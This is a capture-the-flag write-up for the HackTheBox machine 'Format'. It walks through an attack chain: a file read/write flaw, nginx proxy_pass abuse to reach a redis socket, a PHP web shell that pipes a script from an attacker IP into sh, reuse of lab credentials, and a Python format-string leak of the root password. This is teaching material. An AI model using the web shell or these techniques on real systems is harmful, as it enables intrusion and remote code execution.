Format

Summary

Format was a medium machine from HackTheBox which you will need to explore a LFI to read nginx configuration files to discover a proxy_pass vulnerability which you will be able to communicate with the redis unix socket on the machine to change set to a pro status to your account and create a directory which the application have permission to write and execute PHP script. On the machine, you will be able to execute a python script as root, which you need to explore a format string vulnerability to read a secret on the program memory and use it as root password.

Recon

Port scanning

rustscan -a 10.10.11.213 --ulimit 5000 -- -Pn -sC -sV --min-rate=400 -oN '{{ip}}.txt'

# Nmap 7.94 scan initiated Sun Jul  9 10:39:21 2023 as: nmap -vvv -p 22,80,3000 -Pn -sC -sV --min-rate=400 -oN 10.10.11.213.txt 10.10.11.213
Nmap scan report for microblog.htb (10.10.11.213)
Host is up, received user-set (0.14s latency).
Scanned at 2023-07-09 10:39:22 -03 for 17s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c3:97:ce:83:7d:25:5d:5d:ed:b5:45:cd:f2:0b:05:4f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC58JQV36v8AqpQB6tJC5upH5YdXw4LMaUJ4Exx+H6PjPZDab5MSx7Zm1oA1DWewM8tmU8fcprIxykYA8Z66Sd5ll/M1WntYO1b3LxxA0kI9F3yXQU+D2LMV6dGsqalJ80WWYcowlt3hZie6gnz4qEDj7ijCFi5h8K4R2rKtA16sH4FC9EQQU7qgN4WkE7uJSJS/6tWREtV/PspxsiMSBhUE0BreHurM6eaTZGa0VHOyNpbsZ3KXDro0fIOlfovRJVdAwWXF740M+X3aVngS9p1+XrnsVIqcL9T7GdU6H2Tyl5JvnGLdOr2Etd9NW41f+g+RYl7QY6WYbX+30racRmcTUtH4DODyeDXazi6fRUiXBI8pXkD3oLMBSxXsbeGT8Ja3LECPTybIl/jH3KRfl46P7TIUYZ2kqTZqxJ1B6klyZY+woh24UPDrZu/rW9JMaBz2tg97tAiLR8pLZxLrpVH7YmV8vXk2Sgo1rEuqKhBAK98bQuAsbocbjiyrKYAACc=
|   256 b3:aa:30:35:2b:99:7d:20:fe:b6:75:88:40:a5:17:c1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxL4FuxiK0hKkwexmffoZfwAs+0TzHjqgv3sbokWQzlt+YGLBXHmGuLjgjfi9Ir49zbxEL6iAOv8/Mj8hUPQVk=
|   256 fa:b3:7d:6e:1a:bc:d1:4b:68:ed:d6:e8:97:67:27:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK9eUks4+f4DtePOKRJYzDggTf1cOpMhtAxXHGSqr5ng
80/tcp   open  http    syn-ack nginx 1.18.0
|_http-title: 404 Not Found
|_http-server-header: nginx/1.18.0
3000/tcp open  http    syn-ack nginx 1.18.0
|_http-title:  Microblog
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: F6E1A9128148EEAD9EFF823C540EF471
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After ran rustscan with nmap, I noted that's two web services running, entering the page running under de port 3000, I got to a gitea page. Exploring the repositories on the site, I noted a repo called "Microblog", so I downloaded it and started to try find a vulnerability before explore the site in practice.

Shell as www-data

Arbitrary file read and write

Exploring the code searching by vulnerable function, I discover how the site is getting the content and sending to the person who access the site.

At first, we can see the PHP is opening the file called order.txt, reading it contents line per line and passing the line content to the file_get_contents function.

Now, browsing the source code to verify when the order.txt file, I found in the edit/index.php file and started to analyse it.

This part of the program is getting the id post parameter, writing it contents to the order.txt file, getting the txt or header parameter and writing it content to the id value file.

Sending a path traversal payload to read the contents of the /etc/passwd file, we received with successfully the content of the passwd file.

Communicating with redis

After reading some configuration files, I came to the /etc/nginx/sites-avaiable/default file and noted an interesting parameter called proxy_pass.

[...]

server {
        listen 80;
        listen [::]:80;

        root /var/www/microblog/app;

        index index.html index.htm index-nginx-debian.html;

        server_name microblog.htb;

        location / {
                return 404;
        }

        location = /static/css/health/ {
                resolver 127.0.0.1;
                proxy_pass http://css.microbucket.htb/health.txt;
        }

        location = /static/js/health\/ {
                resolver 127.0.0.1;
                proxy_pass http://js.microbucket.htb/health.txt;
        }

        location ~ /static/(.*)/(.*) {
                resolver 127.0.0.1;
                proxy_pass http://$1.microbucket.htb/$2;
        }
}

At first view, it seems like a simple SSRF attack, but searching a little bit more I found an article by Detectify explaining how we can explore it to communicate with unix socks.

The attack is a bit simple, the proxy_pass option is used to the nginx send connection received to a location chosen by the system admin. But instead of we communicate only with http service, we can use the unix wrapper to communicate with socks.

So, checking the source code to see how the Microblog access the redis database, is possible to see it's using the /var/run/redis/redis.sock socks file.

Now, doing a HSET to set the pro value of our account to "true", we received an 502 Bad Gateway message.

But verifying the dashboard if the payload worked, we can see a star informing our account now is pro.

Writing PHP reverse shell

Going back to the code and searching by what in fact changes when we are pro, I noted a new directory called uploads is created and we have permission to write on it.

So using our previous arbitrary file write to write this file to upload/shell.php and acessing the page on the browser, the server downloaded my reverse shell, executed it with sh and I received a shell remote connection.

<?=system("curl 10.10.14.31|sh");?>

Shell as cooper

Reading the database

Accesing the redis database and dumping the cooper.dooper password, I got the zooperdoopercooper password, which I used to login the cooper account using SSH.

e856c57d1f77de142097b4bbab6be7f6.png

Shell as root

Python format string

Executing sudo -l to get the programs the cooper can run on the machine with other users we can see the /usr/bin/license python script.

Reading the source code, a thing called me attention: the format function.

Searching on the web if we can explore this in any way, I found a topic about it on HackTricks explaining how to read in-memory objects.

The attack is simple, we just need to pass an object we can read inside a {} tag. So, creating a new account on the database and inserting a custom payload in the value of first-name key to read the globals, I could to retrieve the secret unCR4ckaBL3Pa$$w0rd and login the root account using it as password.